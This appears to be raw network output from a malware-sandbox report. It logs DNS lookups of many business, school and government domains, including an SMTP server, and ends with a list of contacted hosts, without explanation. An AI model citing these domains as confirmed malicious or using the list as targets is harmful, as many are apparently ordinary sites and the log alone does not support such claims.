                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.359373093 CET8.8.8.8192.168.2.60x533dNo error (0)assideum.com52.219.100.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.367355108 CET8.8.8.8192.168.2.60xc2edNo error (0)rast.se89.221.250.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.380393028 CET8.8.8.8192.168.2.60xa866No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.399950027 CET8.8.8.8192.168.2.60xdddbNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.550486088 CET8.8.8.8192.168.2.60x2adeServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.563711882 CET8.8.8.8192.168.2.60x5debNo error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.601947069 CET8.8.8.8192.168.2.60x3185No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.810606003 CET8.8.8.8192.168.2.60x225bNo error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.219194889 CET8.8.8.8192.168.2.60x1927No error (0)adventist.ro104.21.48.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.219194889 CET8.8.8.8192.168.2.60x1927No error (0)adventist.ro172.67.183.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.448426962 CET8.8.8.8192.168.2.60x8868No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.448426962 CET8.8.8.8192.168.2.60x8868No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.539793968 CET8.8.8.8192.168.2.60xe02aNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:48.277396917 CET8.8.8.8192.168.2.60x417dNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:48.277396917 CET8.8.8.8192.168.2.60x417dNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:51.357419014 CET8.8.8.8192.168.2.60xd333Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:51.465043068 CET8.8.8.8192.168.2.60x90eaNo error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:51.465043068 CET8.8.8.8192.168.2.60x90eaNo error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:51.465043068 CET8.8.8.8192.168.2.60x90eaNo error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:51.465043068 CET8.8.8.8192.168.2.60x90eaNo error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:51.465043068 CET8.8.8.8192.168.2.60x90eaNo error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:52.789577961 CET8.8.8.8192.168.2.60xd333Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:54.045618057 CET8.8.8.8192.168.2.60xd333Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.756970882 CET8.8.8.8192.168.2.60xec3dNo error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.756970882 CET8.8.8.8192.168.2.60xec3dNo error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.757498980 CET8.8.8.8192.168.2.60x393fNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.757529974 CET8.8.8.8192.168.2.60x427aNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.758172035 CET8.8.8.8192.168.2.60xff7fNo error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.758569956 CET8.8.8.8192.168.2.60x6824No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.760747910 CET8.8.8.8192.168.2.60x5f33No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.760792017 CET8.8.8.8192.168.2.60xf148No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.762578964 CET8.8.8.8192.168.2.60x8515No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.764883041 CET8.8.8.8192.168.2.60x2544No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.764883041 CET8.8.8.8192.168.2.60x2544No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.773828030 CET8.8.8.8192.168.2.60xa3afNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.779361963 CET8.8.8.8192.168.2.60xab27No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.797028065 CET8.8.8.8192.168.2.60x9460No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.797028065 CET8.8.8.8192.168.2.60x9460No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.798886061 CET8.8.8.8192.168.2.60xa2f9No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.804330111 CET8.8.8.8192.168.2.60x367dNo error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.840707064 CET8.8.8.8192.168.2.60xeb73No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.842519999 CET8.8.8.8192.168.2.60x8720Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.844016075 CET8.8.8.8192.168.2.60x612eNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.846451044 CET8.8.8.8192.168.2.60x3c12No error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.846451044 CET8.8.8.8192.168.2.60x3c12No error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.865686893 CET8.8.8.8192.168.2.60xb5f7No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.874722958 CET8.8.8.8192.168.2.60x405No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.877515078 CET8.8.8.8192.168.2.60xd950No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878050089 CET8.8.8.8192.168.2.60x2dc6No error (0)anduran.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878050089 CET8.8.8.8192.168.2.60x2dc6No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878050089 CET8.8.8.8192.168.2.60x2dc6No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878050089 CET8.8.8.8192.168.2.60x2dc6No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878204107 CET8.8.8.8192.168.2.60xfe91No error (0)dspears.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878204107 CET8.8.8.8192.168.2.60xfe91No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878204107 CET8.8.8.8192.168.2.60xfe91No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878204107 CET8.8.8.8192.168.2.60xfe91No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.881628990 CET8.8.8.8192.168.2.60xed39No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.881628990 CET8.8.8.8192.168.2.60xed39No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.884835958 CET8.8.8.8192.168.2.60xfa7No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.888267994 CET8.8.8.8192.168.2.60x21f2No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.889538050 CET8.8.8.8192.168.2.60x2320No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.889538050 CET8.8.8.8192.168.2.60x2320No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.889538050 CET8.8.8.8192.168.2.60x2320No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.889538050 CET8.8.8.8192.168.2.60x2320No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.890496969 CET8.8.8.8192.168.2.60x92f9No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.891047955 CET8.8.8.8192.168.2.60x4b5No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.891694069 CET8.8.8.8192.168.2.60x53f4No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.892548084 CET8.8.8.8192.168.2.60xe245No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.893827915 CET8.8.8.8192.168.2.60xdd61No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.895945072 CET8.8.8.8192.168.2.60x7528No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.895945072 CET8.8.8.8192.168.2.60x7528No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.895945072 CET8.8.8.8192.168.2.60x7528No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.895945072 CET8.8.8.8192.168.2.60x7528No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.909112930 CET8.8.8.8192.168.2.60x9b7cServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.911680937 CET8.8.8.8192.168.2.60x716eName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.912628889 CET8.8.8.8192.168.2.60x5a9cNo error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.920819998 CET8.8.8.8192.168.2.60xd4f2No error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.921228886 CET8.8.8.8192.168.2.60xfd18No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.929342985 CET8.8.8.8192.168.2.60x8e81Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.934221983 CET8.8.8.8192.168.2.60x99abName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.941870928 CET8.8.8.8192.168.2.60xc6d6Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.951019049 CET8.8.8.8192.168.2.60x1f8fName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.958175898 CET8.8.8.8192.168.2.60x4ef6Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.961561918 CET8.8.8.8192.168.2.60x4cb4No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.962451935 CET8.8.8.8192.168.2.60xb84bNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.964768887 CET8.8.8.8192.168.2.60x5522No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.975135088 CET8.8.8.8192.168.2.60x2960No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.976363897 CET8.8.8.8192.168.2.60xd50cNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.977256060 CET8.8.8.8192.168.2.60xe6b6No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.977744102 CET8.8.8.8192.168.2.60xdc9bServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.988106012 CET8.8.8.8192.168.2.60x9b13No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.989993095 CET8.8.8.8192.168.2.60x9e14Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.010792017 CET8.8.8.8192.168.2.60xa824No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.011523008 CET8.8.8.8192.168.2.60x17daNo error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.024998903 CET8.8.8.8192.168.2.60x719cNo error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.027996063 CET8.8.8.8192.168.2.60x8278No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.033459902 CET8.8.8.8192.168.2.60x171aNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.058829069 CET8.8.8.8192.168.2.60x9bf7No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.061570883 CET8.8.8.8192.168.2.60x53f7No error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.061570883 CET8.8.8.8192.168.2.60x53f7No error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.183182955 CET8.8.8.8192.168.2.60x8d42No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.183182955 CET8.8.8.8192.168.2.60x8d42No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.183182955 CET8.8.8.8192.168.2.60x8d42No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.185434103 CET8.8.8.8192.168.2.60x57d6No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.193557024 CET8.8.8.8192.168.2.60xe7d9No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.200412035 CET8.8.8.8192.168.2.60x88feNo error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.200412035 CET8.8.8.8192.168.2.60x88feNo error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.217629910 CET8.8.8.8192.168.2.60xf011No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.220403910 CET8.8.8.8192.168.2.60x6489No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.227639914 CET8.8.8.8192.168.2.60x37f9No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.250735044 CET8.8.8.8192.168.2.60x9e9eNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.259291887 CET8.8.8.8192.168.2.60xe256No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.265867949 CET8.8.8.8192.168.2.60x94b7Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.300374031 CET8.8.8.8192.168.2.60x3713No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.302786112 CET8.8.8.8192.168.2.60x13aaServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        • techtrans.de
                                                                                                                                                                                                                                                                        • diamir.de
                                                                                                                                                                                                                                                                        • clinicasanluis.com.co
                                                                                                                                                                                                                                                                        • orlyhotel.com
                                                                                                                                                                                                                                                                        • www.muhr-soehne.de
                                                                                                                                                                                                                                                                        • pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        • dataform.co.uk
                                                                                                                                                                                                                                                                        • sigtoa.com
                                                                                                                                                                                                                                                                        • www.diamir.de
                                                                                                                                                                                                                                                                        • hyab.se
                                                                                                                                                                                                                                                                        • nts-web.net
                                                                                                                                                                                                                                                                        • www.dgmna.com
                                                                                                                                                                                                                                                                        • www.jenco.co.uk
                                                                                                                                                                                                                                                                        • www.olras.com
                                                                                                                                                                                                                                                                        • www.quadlock.com
                                                                                                                                                                                                                                                                        • www.pdqhomes.com
                                                                                                                                                                                                                                                                        • www.baijaku.com
                                                                                                                                                                                                                                                                        • www.pr-park.com
                                                                                                                                                                                                                                                                        • www.rs-ag.com
                                                                                                                                                                                                                                                                        • www.alteor.cl
                                                                                                                                                                                                                                                                        • www.valdal.com
                                                                                                                                                                                                                                                                        • www.item-pr.com
                                                                                                                                                                                                                                                                        • www.depalo.com
                                                                                                                                                                                                                                                                        • www.credo.edu.pl
                                                                                                                                                                                                                                                                        • www.mqs.com.br
                                                                                                                                                                                                                                                                        • www.elpro.si
                                                                                                                                                                                                                                                                        • www.vazir.se
                                                                                                                                                                                                                                                                        • www.tvtools.fi
                                                                                                                                                                                                                                                                        • www.otena.com
                                                                                                                                                                                                                                                                        • www.transsib.com
                                                                                                                                                                                                                                                                        • www.nunomira.com
                                                                                                                                                                                                                                                                        • www.petsfan.com
                                                                                                                                                                                                                                                                        • www.abart.pl
                                                                                                                                                                                                                                                                        • www.iamdirt.com
                                                                                                                                                                                                                                                                        • www.nelipak.nl
                                                                                                                                                                                                                                                                        • www.t-tre.com
                                                                                                                                                                                                                                                                        • www.abdg.com
                                                                                                                                                                                                                                                                        • www.evcpa.com
                                                                                                                                                                                                                                                                        • www.naoi-a.com
                                                                                                                                                                                                                                                                        • www.ora.ecnet.jp
                                                                                                                                                                                                                                                                        • www.wifi4all.nl
                                                                                                                                                                                                                                                                        • www.hummer.hu
                                                                                                                                                                                                                                                                        • www.vexcom.com
                                                                                                                                                                                                                                                                        • www.edimart.hu
                                                                                                                                                                                                                                                                        • www.synetik.net
                                                                                                                                                                                                                                                                        • www.cokocoko.com
                                                                                                                                                                                                                                                                        • www.xaicom.es
                                                                                                                                                                                                                                                                        • www.fcwcvt.org
                                                                                                                                                                                                                                                                        • www.waldi.pl
                                                                                                                                                                                                                                                                        • www.jacomfg.com
                                                                                                                                                                                                                                                                        • www.sjbs.org
                                                                                                                                                                                                                                                                        • www.yocinc.org
                                                                                                                                                                                                                                                                        • www.pcgrate.com
                                                                                                                                                                                                                                                                        • www.aevga.com
                                                                                                                                                                                                                                                                        • www.snugpak.com
                                                                                                                                                                                                                                                                        • www.speelhal.net
                                                                                                                                                                                                                                                                        • www.maktraxx.com
                                                                                                                                                                                                                                                                        • www.jchysk.com
                                                                                                                                                                                                                                                                        • www.findbc.com
                                                                                                                                                                                                                                                                        • www.stnic.co.uk
                                                                                                                                                                                                                                                                        • www.vitaindu.com
                                                                                                                                                                                                                                                                        • www.photo4b.com
                                                                                                                                                                                                                                                                        • www.holleman.us
                                                                                                                                                                                                                                                                        • www.valselit.com
                                                                                                                                                                                                                                                                        • www.c9dd.com
                                                                                                                                                                                                                                                                        • www.dayvo.com
                                                                                                                                                                                                                                                                        • www.fink.com
                                                                                                                                                                                                                                                                        • www.cel-cpa.com
                                                                                                                                                                                                                                                                        • www.crcsi.org
                                                                                                                                                                                                                                                                        • www.netcr.com
                                                                                                                                                                                                                                                                        • www.domon.com
                                                                                                                                                                                                                                                                        • www.2print.com
                                                                                                                                                                                                                                                                        • www.mobilnic.net
                                                                                                                                                                                                                                                                        • www.stajum.com
                                                                                                                                                                                                                                                                        • www.fe-bauer.de
                                                                                                                                                                                                                                                                        • www.x0c.com
                                                                                                                                                                                                                                                                        • www.ora-ito.com
                                                                                                                                                                                                                                                                        • www.lrsuk.com
                                                                                                                                                                                                                                                                        • www.pwd.org
                                                                                                                                                                                                                                                                        • www.nqks.com
                                                                                                                                                                                                                                                                        • www.myropcb.com
                                                                                                                                                                                                                                                                        • www.pupi.cz
                                                                                                                                                                                                                                                                        • www.gpthink.com
                                                                                                                                                                                                                                                                        • www.yoruksut.com
                                                                                                                                                                                                                                                                        • www.medius.si
                                                                                                                                                                                                                                                                        • www.ka-mo-me.com
                                                                                                                                                                                                                                                                        • www.com-sit.com
                                                                                                                                                                                                                                                                        • www.kernsafe.com
                                                                                                                                                                                                                                                                        • www.railbook.net
                                                                                                                                                                                                                                                                        • www.fnsds.org
                                                                                                                                                                                                                                                                        • www.pohlfood.com
                                                                                                                                                                                                                                                                        • www.11tochi.net
                                                                                                                                                                                                                                                                        • www.pb-games.com
                                                                                                                                                                                                                                                                        • www.sclover3.com
                                                                                                                                                                                                                                                                        • www.tyrns.com
                                                                                                                                                                                                                                                                        • www.spanesi.com
                                                                                                                                                                                                                                                                        • www.tc17.com
                                                                                                                                                                                                                                                                        • karila.fr
                                                                                                                                                                                                                                                                        • fifa-ews.com
                                                                                                                                                                                                                                                                        • bount.com.tw
                                                                                                                                                                                                                                                                        • dbnet.at
                                                                                                                                                                                                                                                                        • ramkome.com
                                                                                                                                                                                                                                                                        • biosolve.com
                                                                                                                                                                                                                                                                        • sinwal.com
                                                                                                                                                                                                                                                                        • shittas.com
                                                                                                                                                                                                                                                                        • cbras.com
                                                                                                                                                                                                                                                                        • mcseurope.nl
                                                                                                                                                                                                                                                                        • k-nikko.com
                                                                                                                                                                                                                                                                        • nels.co.uk
                                                                                                                                                                                                                                                                        • jabian.com
                                                                                                                                                                                                                                                                        • cyclad.pl
                                                                                                                                                                                                                                                                        • hamaker.net
                                                                                                                                                                                                                                                                        • shesfit.com
                                                                                                                                                                                                                                                                        • kavram.com
                                                                                                                                                                                                                                                                        • oaith.ca
                                                                                                                                                                                                                                                                        • gbmfg.com
                                                                                                                                                                                                                                                                        • refintl.org
                                                                                                                                                                                                                                                                        • mikihan.com
                                                                                                                                                                                                                                                                        • holp-ai.com
                                                                                                                                                                                                                                                                        • icd-host.com
                                                                                                                                                                                                                                                                        • isom.org
                                                                                                                                                                                                                                                                        • vdoherty.com
                                                                                                                                                                                                                                                                        • burstner.ru
                                                                                                                                                                                                                                                                        • bggs.com
                                                                                                                                                                                                                                                                        • ossir.org
                                                                                                                                                                                                                                                                        • mackusick.de
                                                                                                                                                                                                                                                                        • wanoa.com
                                                                                                                                                                                                                                                                        • gcss.com
                                                                                                                                                                                                                                                                        • top1oil.com
                                                                                                                                                                                                                                                                        • canasil.com
                                                                                                                                                                                                                                                                        • 4locals.net
                                                                                                                                                                                                                                                                        • gydrozo.ru
                                                                                                                                                                                                                                                                        • uhsa.edu.ag
                                                                                                                                                                                                                                                                        • ntc.edu.au
                                                                                                                                                                                                                                                                        • zugseil.com
                                                                                                                                                                                                                                                                        • cubodown.com
                                                                                                                                                                                                                                                                        • fogra.com.pl
                                                                                                                                                                                                                                                                        • anduran.com
                                                                                                                                                                                                                                                                        • wnit.org
                                                                                                                                                                                                                                                                        • nrsi.com
                                                                                                                                                                                                                                                                        • ruzee.com
                                                                                                                                                                                                                                                                        • angework.com
                                                                                                                                                                                                                                                                        • univi.it
                                                                                                                                                                                                                                                                        • kallman.net
                                                                                                                                                                                                                                                                        • akr.co.id
                                                                                                                                                                                                                                                                        • aluminox.es
                                                                                                                                                                                                                                                                        • doggybag.org
                                                                                                                                                                                                                                                                        • yhsll.com
                                                                                                                                                                                                                                                                        • s5w.com
                                                                                                                                                                                                                                                                        • t-mould.com
                                                                                                                                                                                                                                                                        • biurohera.pl
                                                                                                                                                                                                                                                                        • ikulani.com
                                                                                                                                                                                                                                                                        • listel.co.jp
                                                                                                                                                                                                                                                                        • geecl.com
                                                                                                                                                                                                                                                                        • mondopp.net
                                                                                                                                                                                                                                                                        • absblast.com
                                                                                                                                                                                                                                                                        • zupraha.cz
                                                                                                                                                                                                                                                                        • metaforacom.com
                                                                                                                                                                                                                                                                        • skypearl.com
                                                                                                                                                                                                                                                                        • muhr-soehne.de
                                                                                                                                                                                                                                                                        • insia.com
                                                                                                                                                                                                                                                                        • strazynski.pl
